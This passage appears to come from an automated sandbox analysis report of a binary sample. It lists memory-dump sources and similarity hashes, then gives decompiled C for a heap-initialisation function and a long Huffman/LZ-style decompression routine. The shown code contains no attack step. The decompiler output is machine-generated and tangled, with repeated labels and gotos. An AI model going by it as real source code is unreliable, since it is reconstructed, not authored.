          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID:
          • String ID: 0C#
          • API String ID: 0-2719568182
          • Opcode ID: 6c2e69637d4c3aa2440d6bed836e5b2c4f8daf103c6bcf31a20d8bfb977990a3
          • Instruction ID: 9c500baac5caf81c479040b45a44c350ef74bb256de2c7cc0b6242b3b1903f34
          • Opcode Fuzzy Hash: 6c2e69637d4c3aa2440d6bed836e5b2c4f8daf103c6bcf31a20d8bfb977990a3
          • Instruction Fuzzy Hash: 8051B4345083994EC712DF25919047EBFE1AFFA318F49489EE5D58B222D231E689CB53
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0021ACA1() {
          				signed int _t3;
          
          				_t3 = GetProcessHeap();
          				 *0x250874 = _t3;
          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
          			}





          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: HeapProcess
          • String ID:
          • API String ID: 54951025-0
          • Opcode ID: 0ede412cbfbfec4f5675f932495afe1ec6696733b5099a1142ff72501ed10528
          • Instruction ID: 41594494bf5295054fd9138ab5219a3982aa33b7f34107d6330423dfbeea77d3
          • Opcode Fuzzy Hash: 0ede412cbfbfec4f5675f932495afe1ec6696733b5099a1142ff72501ed10528
          • Instruction Fuzzy Hash: E4A02230202300EF8B208F30BF0CB0C3AE8BA00BC2308A028AA0CC2230EB32C0308B00
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 96%
          			E0020589E(intOrPtr __esi) {
          				signed int _t314;
          				signed int _t315;
          				signed int _t316;
          				signed int _t318;
          				signed int _t319;
          				signed int _t320;
          				signed int _t321;
          				signed int _t322;
          				signed int _t324;
          				signed int _t325;
          				signed int _t326;
          				void* _t328;
          				intOrPtr _t333;
          				signed int _t347;
          				char _t356;
          				unsigned int _t359;
          				void* _t366;
          				intOrPtr _t371;
          				signed int _t381;
          				char _t390;
          				unsigned int _t391;
          				void* _t399;
          				intOrPtr _t400;
          				signed int _t403;
          				char _t412;
          				signed int _t414;
          				intOrPtr _t415;
          				signed int _t417;
          				signed int _t418;
          				signed int _t419;
          				signed int _t420;
          				signed int _t422;
          				signed int _t423;
          				signed short _t424;
          				signed int _t425;
          				signed int _t428;
          				signed int _t429;
          				signed int _t430;
          				signed int _t431;
          				signed int _t433;
          				signed int _t434;
          				signed short _t435;
          				unsigned int _t439;
          				unsigned int _t444;
          				signed int _t458;
          				signed int _t460;
          				signed int _t461;
          				signed int _t464;
          				signed int _t466;
          				signed int _t468;
          				signed int _t471;
          				signed int _t472;
          				signed int _t473;
          				intOrPtr* _t474;
          				signed int _t478;
          				signed int _t479;
          				intOrPtr _t483;
          				unsigned int _t486;
          				void* _t488;
          				signed int _t491;
          				signed int* _t493;
          				unsigned int _t496;
          				void* _t498;
          				signed int _t501;
          				signed int _t503;
          				signed int _t511;
          				void* _t514;
          				signed int _t517;
          				signed int _t519;
          				signed int _t522;
          				void* _t525;
          				signed int _t528;
          				signed int _t529;
          				intOrPtr* _t531;
          				void* _t532;
          				signed int _t535;
          				signed int _t537;
          				signed int _t539;
          				unsigned int _t546;
          				void* _t548;
          				signed int _t551;
          				unsigned int _t555;
          				void* _t557;
          				signed int _t560;
          				intOrPtr* _t562;
          				void* _t563;
          				signed int _t566;
          				void* _t569;
          				signed int _t572;
          				intOrPtr* _t575;
          				void* _t576;
          				signed int _t579;
          				void* _t582;
          				signed int _t585;
          				signed int _t586;
          				intOrPtr* _t591;
          				void* _t592;
          				signed int _t595;
          				signed int* _t598;
          				unsigned int _t600;
          				signed int _t603;
          				unsigned int _t605;
          				signed int _t608;
          				void* _t611;
          				signed int _t613;
          				signed int _t614;
          				void* _t615;
          				unsigned int _t617;
          				unsigned int _t621;
          				signed int _t624;
          				signed int _t625;
          				signed int _t626;
          				signed int _t627;
          				signed int _t628;
          				signed int _t629;
          				unsigned int _t632;
          				signed int _t634;
          				intOrPtr* _t637;
          				intOrPtr _t638;
          				signed int _t639;
          				signed int _t640;
          				signed int _t641;
          				signed int _t643;
          				signed int _t644;
          				signed int _t645;
          				char* _t646;
          				signed int _t648;
          				signed int _t649;
          				signed int _t651;
          				char* _t652;
          				intOrPtr* _t656;
          				signed int _t657;
          				void* _t658;
          				void* _t661;
          
          				L0:
          				while(1) {
          					L0:
          					_t638 = __esi;
          					_t598 = __esi + 0x7c;
          					while(1) {
          						L1:
          						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
          						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
          							goto L12;
          						} else {
          							_t637 = _t638 + 0x8c;
          						}
          						while(1) {
          							L3:
          							_t661 =  *_t643 -  *((intOrPtr*)(_t638 + 0x94)) - 1 +  *_t637;
          							if(_t661 <= 0 && (_t661 != 0 ||  *(_t638 + 8) <  *((intOrPtr*)(_t638 + 0x90)))) {
          								break;
          							}
          							L6:
          							if( *((char*)(_t638 + 0x9c)) != 0) {
          								L99:
          								_t415 = E002047DA(_t638);
          								L100:
          								return _t415;
          							}
          							L7:
          							_push(_t637);
          							_push(_t643);
          							_t415 = E002033D3(_t638);
          							if(_t415 == 0) {
          								goto L100;
          							}
          							L8:
          							_push(_t638 + 0xa0);
          							_push(_t637);
          							_push(_t643);
          							_t415 = E0020397F(_t638);
          							if(_t415 != 0) {
          								continue;
          							} else {
          								goto L100;
          							}
          						}
          						L10:
          						_t458 = E00204422(_t638);
          						__eflags = _t458;
          						if(_t458 == 0) {
          							goto L99;
          						} else {
          							_t598 = _t638 + 0x7c;
          						}
          						L12:
          						_t483 =  *((intOrPtr*)(_t638 + 0x4b3c));
          						__eflags = (_t483 -  *_t598 &  *(_t638 + 0xe6dc)) - 0x1004;
          						if((_t483 -  *_t598 &  *(_t638 + 0xe6dc)) >= 0x1004) {
          							L18:
          							_t314 = E001FA4ED(_t643);
          							_t315 =  *(_t638 + 0x124);
          							_t600 = _t314 & 0x0000fffe;
          							__eflags = _t600 -  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4));
          							if(_t600 >=  *((intOrPtr*)(_t638 + 0xa4 + _t315 * 4))) {
          								L20:
          								_t627 = 0xf;
          								_t316 = _t315 + 1;
          								__eflags = _t316 - _t627;
          								if(_t316 >= _t627) {
          									L26:
          									_t486 =  *(_t643 + 4) + _t627;
          									 *(_t643 + 4) = _t486 & 0x00000007;
          									_t318 = _t486 >> 3;
          									 *_t643 =  *_t643 + _t318;
          									_t488 = 0x10;
          									_t491 =  *((intOrPtr*)(_t638 + 0xe4 + _t627 * 4)) + (_t600 -  *((intOrPtr*)(_t638 + 0xa0 + _t627 * 4)) >> _t488 - _t627);
          									__eflags = _t491 -  *((intOrPtr*)(_t638 + 0xa0));
          									asm("sbb eax, eax");
          									_t319 = _t318 & _t491;
          									__eflags = _t319;
          									_t460 =  *(_t638 + 0xd28 + _t319 * 2) & 0x0000ffff;
          									goto L27;
          								} else {
          									_t591 = _t638 + (_t316 + 0x29) * 4;
          									while(1) {
          										L22:
          										__eflags = _t600 -  *_t591;
          										if(_t600 <  *_t591) {
          											_t627 = _t316;
          											goto L26;
          										}
          										L23:
          										_t316 = _t316 + 1;
          										_t591 = _t591 + 4;
          										__eflags = _t316 - 0xf;
          										if(_t316 < 0xf) {
          											continue;
          										} else {
          											goto L26;
          										}
          									}
          									goto L26;
          								}
          							} else {
          								_t592 = 0x10;
          								_t626 = _t600 >> _t592 - _t315;
          								_t595 = ( *(_t626 + _t638 + 0x128) & 0x000000ff) +  *(_t643 + 4);
          								 *_t643 =  *_t643 + (_t595 >> 3);
          								 *(_t643 + 4) = _t595 & 0x00000007;
          								_t460 =  *(_t638 + 0x528 + _t626 * 2) & 0x0000ffff;
          								L27:
          								__eflags = _t460 - 0x100;
          								if(_t460 >= 0x100) {
          									L31:
          									__eflags = _t460 - 0x106;
          									if(_t460 < 0x106) {
          										L96:
          										__eflags = _t460 - 0x100;
          										if(_t460 != 0x100) {
          											L102:
          											__eflags = _t460 - 0x101;
          											if(_t460 != 0x101) {
          												L129:
          												_t461 = _t460 + 0xfffffefe;
          												__eflags = _t461;
          												_t493 = _t638 + (_t461 + 0x18) * 4;
          												_t603 =  *_t493;
          												 *(_t658 + 0x30) = _t603;
          												if(_t461 == 0) {
          													L131:
          													 *(_t638 + 0x60) = _t603;
          													_t320 = E001FA4ED(_t643);
          													_t321 =  *(_t638 + 0x2de8);
          													_t605 = _t320 & 0x0000fffe;
          													__eflags = _t605 -  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4));
          													if(_t605 >=  *((intOrPtr*)(_t638 + 0x2d68 + _t321 * 4))) {
          														L133:
          														_t628 = 0xf;
          														_t322 = _t321 + 1;
          														__eflags = _t322 - _t628;
          														if(_t322 >= _t628) {
          															L139:
          															_t496 =  *(_t643 + 4) + _t628;
          															 *(_t643 + 4) = _t496 & 0x00000007;
          															_t324 = _t496 >> 3;
          															 *_t643 =  *_t643 + _t324;
          															_t498 = 0x10;
          															_t501 =  *((intOrPtr*)(_t638 + 0x2da8 + _t628 * 4)) + (_t605 -  *((intOrPtr*)(_t638 + 0x2d64 + _t628 * 4)) >> _t498 - _t628);
          															__eflags = _t501 -  *((intOrPtr*)(_t638 + 0x2d64));
          															asm("sbb eax, eax");
          															_t325 = _t324 & _t501;
          															__eflags = _t325;
          															_t326 =  *(_t638 + 0x39ec + _t325 * 2) & 0x0000ffff;
          															L140:
          															_t629 = _t326 & 0x0000ffff;
          															__eflags = _t629 - 8;
          															if(_t629 >= 8) {
          																_t464 = (_t629 >> 2) - 1;
          																_t629 = (_t629 & 0x00000003 | 0x00000004) << _t464;
          																__eflags = _t629;
          															} else {
          																_t464 = 0;
          															}
          															_t632 = _t629 + 2;
          															__eflags = _t464;
          															if(_t464 != 0) {
          																_t391 = E001FA4ED(_t643);
          																_t525 = 0x10;
          																_t632 = _t632 + (_t391 >> _t525 - _t464);
          																_t528 =  *(_t643 + 4) + _t464;
          																 *_t643 =  *_t643 + (_t528 >> 3);
          																_t529 = _t528 & 0x00000007;
          																__eflags = _t529;
          																 *(_t643 + 4) = _t529;
          															}
          															__eflags =  *((char*)(_t638 + 0x4c44));
          															_t608 =  *(_t658 + 0x30);
          															 *(_t638 + 0x74) = _t632;
          															if( *((char*)(_t638 + 0x4c44)) == 0) {
          																L147:
          																_t503 =  *(_t638 + 0x7c);
          																_t466 = _t503 - _t608;
          																_t328 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
          																__eflags = _t466 - _t328;
          																if(_t466 >= _t328) {
          																	L158:
          																	__eflags = _t632;
          																	if(_t632 == 0) {
          																		while(1) {
          																			L0:
          																			_t638 = __esi;
          																			_t598 = __esi + 0x7c;
          																			goto L1;
          																		}
          																	}
          																	L159:
          																	_t644 =  *(_t638 + 0xe6dc);
          																	do {
          																		L160:
          																		_t645 = _t644 & _t466;
          																		_t466 = _t466 + 1;
          																		 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t645));
          																		_t598 = _t638 + 0x7c;
          																		_t644 =  *(_t638 + 0xe6dc);
          																		 *_t598 =  *_t598 + 0x00000001 & _t644;
          																		_t632 = _t632 - 1;
          																		__eflags = _t632;
          																	} while (_t632 != 0);
          																	goto L161;
          																}
          																L148:
          																__eflags = _t503 - _t328;
          																if(_t503 >= _t328) {
          																	goto L158;
          																}
          																L149:
          																_t333 =  *((intOrPtr*)(_t638 + 0x4b40));
          																_t468 = _t466 + _t333;
          																_t646 = _t333 + _t503;
          																 *(_t638 + 0x7c) = _t503 + _t632;
          																__eflags = _t608 - _t632;
          																if(_t608 >= _t632) {
          																	L154:
          																	__eflags = _t632 - 8;
          																	if(_t632 < 8) {
          																		goto L117;
          																	}
          																	L155:
          																	_t347 = _t632 >> 3;
          																	__eflags = _t347;
          																	 *(_t658 + 0x30) = _t347;
          																	_t639 = _t347;
          																	do {
          																		L156:
          																		E0020EA80(_t646, _t468, 8);
          																		_t658 = _t658 + 0xc;
          																		_t468 = _t468 + 8;
          																		_t646 = _t646 + 8;
          																		_t632 = _t632 - 8;
          																		_t639 = _t639 - 1;
          																		__eflags = _t639;
          																	} while (_t639 != 0);
          																	goto L116;
          																}
          																L150:
          																_t611 = 8;
          																__eflags = _t632 - _t611;
          																if(_t632 < _t611) {
          																	goto L117;
          																}
          																L151:
          																_t511 = _t632 >> 3;
          																__eflags = _t511;
          																do {
          																	L152:
          																	_t632 = _t632 - _t611;
          																	 *_t646 =  *_t468;
          																	 *((char*)(_t646 + 1)) =  *(_t468 + 1);
          																	 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
          																	 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
          																	 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
          																	 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
          																	 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
          																	_t356 =  *((intOrPtr*)(_t468 + 7));
          																	_t468 = _t468 + _t611;
          																	 *((char*)(_t646 + 7)) = _t356;
          																	_t646 = _t646 + _t611;
          																	_t511 = _t511 - 1;
          																	__eflags = _t511;
          																} while (_t511 != 0);
          																goto L117;
          															} else {
          																L146:
          																_push( *(_t638 + 0xe6dc));
          																_push(_t638 + 0x7c);
          																_push(_t608);
          																L71:
          																_push(_t632);
          																E002020EE();
          																goto L0;
          																do {
          																	while(1) {
          																		L0:
          																		_t638 = __esi;
          																		_t598 = __esi + 0x7c;
          																		do {
          																			while(1) {
          																				L1:
          																				 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
          																				if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
          																					goto L12;
          																				} else {
          																					_t637 = _t638 + 0x8c;
          																				}
          																				goto L3;
          																			}
          																			goto L103;
          																		} while (_t632 == 0);
          																		__eflags =  *((char*)(_t638 + 0x4c44));
          																		if( *((char*)(_t638 + 0x4c44)) == 0) {
          																			L106:
          																			_t537 =  *(_t638 + 0x7c);
          																			_t614 =  *(_t638 + 0x60);
          																			_t399 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
          																			_t468 = _t537 - _t614;
          																			__eflags = _t468 - _t399;
          																			if(_t468 >= _t399) {
          																				L125:
          																				__eflags = _t632;
          																				if(_t632 == 0) {
          																					while(1) {
          																						L0:
          																						_t638 = __esi;
          																						_t598 = __esi + 0x7c;
          																						L1:
          																						 *_t598 =  *_t598 &  *(_t638 + 0xe6dc);
          																						if( *_t643 <  *((intOrPtr*)(_t638 + 0x88))) {
          																							goto L12;
          																						} else {
          																							_t637 = _t638 + 0x8c;
          																						}
          																					}
          																				}
          																				L126:
          																				_t648 =  *(_t638 + 0xe6dc);
          																				do {
          																					L127:
          																					_t649 = _t648 & _t468;
          																					_t468 = _t468 + 1;
          																					 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)( *((intOrPtr*)(_t638 + 0x4b40)) + _t649));
          																					_t598 = _t638 + 0x7c;
          																					_t648 =  *(_t638 + 0xe6dc);
          																					 *_t598 =  *_t598 + 0x00000001 & _t648;
          																					_t632 = _t632 - 1;
          																					__eflags = _t632;
          																				} while (_t632 != 0);
          																				L161:
          																				_t643 = _t638 + 4;
          																				goto L1;
          																			}
          																			L107:
          																			__eflags = _t537 - _t399;
          																			if(_t537 >= _t399) {
          																				goto L125;
          																			}
          																			L108:
          																			_t400 =  *((intOrPtr*)(_t638 + 0x4b40));
          																			_t468 = _t468 + _t400;
          																			_t646 = _t400 + _t537;
          																			 *(_t638 + 0x7c) = _t537 + _t632;
          																			__eflags = _t614 - _t632;
          																			if(_t614 >= _t632) {
          																				L113:
          																				__eflags = _t632 - 8;
          																				if(_t632 < 8) {
          																					L117:
          																					_t598 = _t638 + 0x7c;
          																					__eflags = _t632;
          																					if(_t632 == 0) {
          																						goto L161;
          																					}
          																					L118:
          																					_t598 = _t638 + 0x7c;
          																					 *_t646 =  *_t468;
          																					__eflags = _t632 - 1;
          																					if(_t632 <= 1) {
          																						goto L161;
          																					}
          																					L119:
          																					_t598 = _t638 + 0x7c;
          																					 *((char*)(_t646 + 1)) =  *(_t468 + 1);
          																					__eflags = _t632 - 2;
          																					if(_t632 <= 2) {
          																						goto L161;
          																					}
          																					L120:
          																					_t598 = _t638 + 0x7c;
          																					 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
          																					__eflags = _t632 - 3;
          																					if(_t632 <= 3) {
          																						goto L161;
          																					}
          																					L121:
          																					_t598 = _t638 + 0x7c;
          																					 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
          																					__eflags = _t632 - 4;
          																					if(_t632 <= 4) {
          																						goto L161;
          																					}
          																					L122:
          																					_t598 = _t638 + 0x7c;
          																					 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
          																					__eflags = _t632 - 5;
          																					if(_t632 <= 5) {
          																						goto L161;
          																					}
          																					L123:
          																					_t598 = _t638 + 0x7c;
          																					 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
          																					__eflags = _t632 - 6;
          																					if(_t632 <= 6) {
          																						goto L161;
          																					}
          																					L124:
          																					 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
          																					while(1) {
          																						L0:
          																						_t638 = __esi;
          																						_t598 = __esi + 0x7c;
          																						goto L1;
          																					}
          																				}
          																				L114:
          																				_t403 = _t632 >> 3;
          																				__eflags = _t403;
          																				 *(_t658 + 0x30) = _t403;
          																				_t641 = _t403;
          																				do {
          																					L115:
          																					E0020EA80(_t646, _t468, 8);
          																					_t658 = _t658 + 0xc;
          																					_t468 = _t468 + 8;
          																					_t646 = _t646 + 8;
          																					_t632 = _t632 - 8;
          																					_t641 = _t641 - 1;
          																					__eflags = _t641;
          																				} while (_t641 != 0);
          																				L116:
          																				_t638 =  *((intOrPtr*)(_t658 + 0x10));
          																				goto L117;
          																			}
          																			L109:
          																			_t615 = 8;
          																			__eflags = _t632 - _t615;
          																			if(_t632 < _t615) {
          																				goto L117;
          																			}
          																			L110:
          																			_t539 = _t632 >> 3;
          																			__eflags = _t539;
          																			do {
          																				L111:
          																				_t632 = _t632 - _t615;
          																				 *_t646 =  *_t468;
          																				 *((char*)(_t646 + 1)) =  *(_t468 + 1);
          																				 *((char*)(_t646 + 2)) =  *((intOrPtr*)(_t468 + 2));
          																				 *((char*)(_t646 + 3)) =  *((intOrPtr*)(_t468 + 3));
          																				 *((char*)(_t646 + 4)) =  *((intOrPtr*)(_t468 + 4));
          																				 *((char*)(_t646 + 5)) =  *((intOrPtr*)(_t468 + 5));
          																				 *((char*)(_t646 + 6)) =  *((intOrPtr*)(_t468 + 6));
          																				_t412 =  *((intOrPtr*)(_t468 + 7));
          																				_t468 = _t468 + _t615;
          																				 *((char*)(_t646 + 7)) = _t412;
          																				_t646 = _t646 + _t615;
          																				_t539 = _t539 - 1;
          																				__eflags = _t539;
          																			} while (_t539 != 0);
          																			goto L117;
          																		}
          																		L105:
          																		_push( *(_t638 + 0xe6dc));
          																		_push(_t638 + 0x7c);
          																		_push( *(_t638 + 0x60));
          																		goto L71;
          																	}
          																	L98:
          																	_t417 = E00201A0E(_t638, _t658 + 0x1c);
          																	__eflags = _t417;
          																} while (_t417 != 0);
          																goto L99;
          															}
          														}
          														L134:
          														_t531 = _t638 + (_t322 + 0xb5a) * 4;
          														while(1) {
          															L135:
          															__eflags = _t605 -  *_t531;
          															if(_t605 <  *_t531) {
          																break;
          															}
          															L136:
          															_t322 = _t322 + 1;
          															_t531 = _t531 + 4;
          															__eflags = _t322 - 0xf;
          															if(_t322 < 0xf) {
          																continue;
          															}
          															L137:
          															goto L139;
          														}
          														L138:
          														_t628 = _t322;
          														goto L139;
          													}
          													L132:
          													_t532 = 0x10;
          													_t613 = _t605 >> _t532 - _t321;
          													_t535 = ( *(_t613 + _t638 + 0x2dec) & 0x000000ff) +  *(_t643 + 4);
          													 *_t643 =  *_t643 + (_t535 >> 3);
          													 *(_t643 + 4) = _t535 & 0x00000007;
          													_t326 =  *(_t638 + 0x31ec + _t613 * 2) & 0x0000ffff;
          													goto L140;
          												} else {
          													goto L130;
          												}
          												do {
          													L130:
          													 *_t493 =  *(_t493 - 4);
          													_t493 = _t493 - 4;
          													_t461 = _t461 - 1;
          													__eflags = _t461;
          												} while (_t461 != 0);
          												goto L131;
          											}
          											L103:
          											_t632 =  *(_t638 + 0x74);
          											_t598 = _t638 + 0x7c;
          											__eflags = _t632;
          										}
          										L97:
          										_push(_t658 + 0x1c);
          										_t414 = E00203564(_t638, _t643);
          										__eflags = _t414;
          										if(_t414 == 0) {
          											goto L99;
          										}
          										goto L98;
          									}
          									L32:
          									_t634 = _t460 - 0x106;
          									__eflags = _t634 - 8;
          									if(_t634 >= 8) {
          										_t478 = (_t634 >> 2) - 1;
          										_t634 = (_t634 & 0x00000003 | 0x00000004) << _t478;
          										__eflags = _t634;
          									} else {
          										_t478 = 0;
          									}
          									_t632 = _t634 + 2;
          									__eflags = _t478;
          									if(_t478 != 0) {
          										_t444 = E001FA4ED(_t643);
          										_t582 = 0x10;
          										_t632 = _t632 + (_t444 >> _t582 - _t478);
          										_t585 =  *(_t643 + 4) + _t478;
          										 *_t643 =  *_t643 + (_t585 >> 3);
          										_t586 = _t585 & 0x00000007;
          										__eflags = _t586;
          										 *(_t643 + 4) = _t586;
          									}
          									_t418 = E001FA4ED(_t643);
          									_t419 =  *(_t638 + 0x1010);
          									_t617 = _t418 & 0x0000fffe;
          									__eflags = _t617 -  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4));
          									if(_t617 >=  *((intOrPtr*)(_t638 + 0xf90 + _t419 * 4))) {
          										L39:
          										_t479 = 0xf;
          										_t420 = _t419 + 1;
          										__eflags = _t420 - _t479;
          										if(_t420 >= _t479) {
          											L45:
          											_t546 =  *(_t643 + 4) + _t479;
          											 *(_t643 + 4) = _t546 & 0x00000007;
          											_t422 = _t546 >> 3;
          											 *_t643 =  *_t643 + _t422;
          											_t548 = 0x10;
          											_t551 =  *((intOrPtr*)(_t638 + 0xfd0 + _t479 * 4)) + (_t617 -  *((intOrPtr*)(_t638 + 0xf8c + _t479 * 4)) >> _t548 - _t479);
          											__eflags = _t551 -  *((intOrPtr*)(_t638 + 0xf8c));
          											asm("sbb eax, eax");
          											_t423 = _t422 & _t551;
          											__eflags = _t423;
          											_t424 =  *(_t638 + 0x1c14 + _t423 * 2) & 0x0000ffff;
          											goto L46;
          										}
          										L40:
          										_t575 = _t638 + (_t420 + 0x3e4) * 4;
          										while(1) {
          											L41:
          											__eflags = _t617 -  *_t575;
          											if(_t617 <  *_t575) {
          												break;
          											}
          											L42:
          											_t420 = _t420 + 1;
          											_t575 = _t575 + 4;
          											__eflags = _t420 - 0xf;
          											if(_t420 < 0xf) {
          												continue;
          											}
          											L43:
          											goto L45;
          										}
          										L44:
          										_t479 = _t420;
          										goto L45;
          									} else {
          										L38:
          										_t576 = 0x10;
          										_t625 = _t617 >> _t576 - _t419;
          										_t579 = ( *(_t625 + _t638 + 0x1014) & 0x000000ff) +  *(_t643 + 4);
          										 *_t643 =  *_t643 + (_t579 >> 3);
          										 *(_t643 + 4) = _t579 & 0x00000007;
          										_t424 =  *(_t638 + 0x1414 + _t625 * 2) & 0x0000ffff;
          										L46:
          										_t425 = _t424 & 0x0000ffff;
          										__eflags = _t425 - 4;
          										if(_t425 >= 4) {
          											_t643 = (_t425 >> 1) - 1;
          											_t425 = (_t425 & 0x00000001 | 0x00000002) << _t643;
          											__eflags = _t425;
          										} else {
          											_t643 = 0;
          										}
          										_t428 = _t425 + 1;
          										 *(_t658 + 0x14) = _t428;
          										_t471 = _t428;
          										 *(_t658 + 0x30) = _t471;
          										__eflags = _t643;
          										if(_t643 == 0) {
          											L64:
          											_t643 = _t638 + 4;
          											goto L65;
          										} else {
          											L50:
          											__eflags = _t643 - 4;
          											if(__eflags < 0) {
          												L72:
          												_t359 = E00207D76(_t638 + 4);
          												_t514 = 0x20;
          												_t471 = (_t359 >> _t514 - _t643) +  *(_t658 + 0x14);
          												_t517 =  *(_t638 + 8) + _t643;
          												 *(_t658 + 0x30) = _t471;
          												_t643 = _t638 + 4;
          												 *_t643 =  *_t643 + (_t517 >> 3);
          												 *(_t643 + 4) = _t517 & 0x00000007;
          												L65:
          												__eflags = _t471 - 0x100;
          												if(_t471 > 0x100) {
          													_t632 = _t632 + 1;
          													__eflags = _t471 - 0x2000;
          													if(_t471 > 0x2000) {
          														_t632 = _t632 + 1;
          														__eflags = _t471 - 0x40000;
          														if(_t471 > 0x40000) {
          															_t632 = _t632 + 1;
          															__eflags = _t632;
          														}
          													}
          												}
          												 *(_t638 + 0x6c) =  *(_t638 + 0x68);
          												 *(_t638 + 0x68) =  *(_t638 + 0x64);
          												 *(_t638 + 0x64) =  *(_t638 + 0x60);
          												 *(_t638 + 0x60) = _t471;
          												__eflags =  *((char*)(_t638 + 0x4c44));
          												 *(_t638 + 0x74) = _t632;
          												if( *((char*)(_t638 + 0x4c44)) == 0) {
          													L73:
          													_t598 = _t638 + 0x7c;
          													_t519 =  *_t598;
          													_t366 =  *((intOrPtr*)(_t638 + 0xe6d8)) + 0xffffeffc;
          													_t651 = _t519 - _t471;
          													__eflags = _t651 - _t366;
          													if(_t651 >= _t366) {
          														L92:
          														__eflags = _t632;
          														if(_t632 == 0) {
          															goto L161;
          														}
          														L93:
          														_t472 =  *(_t638 + 0xe6dc);
          														do {
          															L94:
          															_t473 = _t472 & _t651;
          															_t651 = _t651 + 1;
          															 *((char*)( *((intOrPtr*)(_t638 + 0x4b40)) +  *(_t638 + 0x7c))) =  *((intOrPtr*)(_t473 +  *((intOrPtr*)(_t638 + 0x4b40))));
          															_t598 = _t638 + 0x7c;
          															_t472 =  *(_t638 + 0xe6dc);
          															 *_t598 =  *_t598 + 0x00000001 & _t472;
          															_t632 = _t632 - 1;
          															__eflags = _t632;
          														} while (_t632 != 0);
          														goto L161;
          													}
          													L74:
          													__eflags = _t519 - _t366;
          													if(_t519 >= _t366) {
          														goto L92;
          													}
          													L75:
          													_t371 =  *((intOrPtr*)(_t638 + 0x4b40));
          													_t474 = _t371 + _t651;
          													_t652 = _t371 + _t519;
          													 *_t598 = _t519 + _t632;
          													__eflags =  *(_t658 + 0x30) - _t632;
          													if( *(_t658 + 0x30) >= _t632) {
          														L80:
          														__eflags = _t632 - 8;
          														if(_t632 < 8) {
          															L84:
          															__eflags = _t632;
          															if(_t632 != 0) {
          																 *_t652 =  *_t474;
          																__eflags = _t632 - 1;
          																if(_t632 > 1) {
          																	 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
          																	__eflags = _t632 - 2;
          																	if(_t632 > 2) {
          																		 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
          																		__eflags = _t632 - 3;
          																		if(_t632 > 3) {
          																			 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
          																			__eflags = _t632 - 4;
          																			if(_t632 > 4) {
          																				 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
          																				__eflags = _t632 - 5;
          																				if(_t632 > 5) {
          																					 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
          																					__eflags = _t632 - 6;
          																					if(_t632 > 6) {
          																						 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
          																					}
          																				}
          																			}
          																		}
          																	}
          																}
          															}
          															goto L161;
          														}
          														L81:
          														_t381 = _t632 >> 3;
          														__eflags = _t381;
          														 *(_t658 + 0x30) = _t381;
          														_t640 = _t381;
          														do {
          															L82:
          															E0020EA80(_t652, _t474, 8);
          															_t658 = _t658 + 0xc;
          															_t474 = _t474 + 8;
          															_t652 = _t652 + 8;
          															_t632 = _t632 - 8;
          															_t640 = _t640 - 1;
          															__eflags = _t640;
          														} while (_t640 != 0);
          														_t638 =  *((intOrPtr*)(_t658 + 0x10));
          														_t598 =  *(_t658 + 0x18);
          														goto L84;
          													}
          													L76:
          													__eflags = _t632 - 8;
          													if(_t632 < 8) {
          														goto L84;
          													}
          													L77:
          													_t522 = _t632 >> 3;
          													__eflags = _t522;
          													do {
          														L78:
          														_t632 = _t632 - 8;
          														 *_t652 =  *_t474;
          														 *((char*)(_t652 + 1)) =  *((intOrPtr*)(_t474 + 1));
          														 *((char*)(_t652 + 2)) =  *((intOrPtr*)(_t474 + 2));
          														 *((char*)(_t652 + 3)) =  *((intOrPtr*)(_t474 + 3));
          														 *((char*)(_t652 + 4)) =  *((intOrPtr*)(_t474 + 4));
          														 *((char*)(_t652 + 5)) =  *((intOrPtr*)(_t474 + 5));
          														 *((char*)(_t652 + 6)) =  *((intOrPtr*)(_t474 + 6));
          														_t390 =  *((intOrPtr*)(_t474 + 7));
          														_t474 = _t474 + 8;
